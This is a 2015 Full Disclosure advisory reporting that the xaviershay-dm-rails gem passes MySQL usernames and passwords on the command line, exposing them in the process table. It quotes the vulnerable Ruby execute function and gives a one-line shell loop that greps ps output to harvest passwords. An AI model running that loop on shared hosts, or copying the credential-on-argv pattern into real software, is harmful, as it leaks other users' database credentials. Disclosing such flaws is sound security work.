[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] xaviershay-dm-rails v0.10.3.8 mysql credential exposure
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] xaviershay-dm-rails v0.10.3.8 mysql credential exposure
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Sat, 21 Feb 2015 18:08:44 -0500
Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net
Description: This gem provides the railtie that allows datamapper to hook into
rails3 and thus behave like a rails framework component. Just like activerecord
does in rails, dm-rails uses the railtie API to hook into rails. The two are
actually hooked into rails almost identically.
Vulnerability:
The problem is with the execute function exposing the user credentials to the
process table.
Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:
def execute(statement)
system(
'mysql',
(username.blank? ? '' : "--user=#{username}"),
(password.blank? ? '' : "--password=#{password}"),
'-e',
statement
)
end
OSVDB:118579
Exploit Code:
• $ while (true) do ps -ef |grep [p]assword; done
Advisory: http://www.vapid.dhs.org/advisory.php?v=115
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/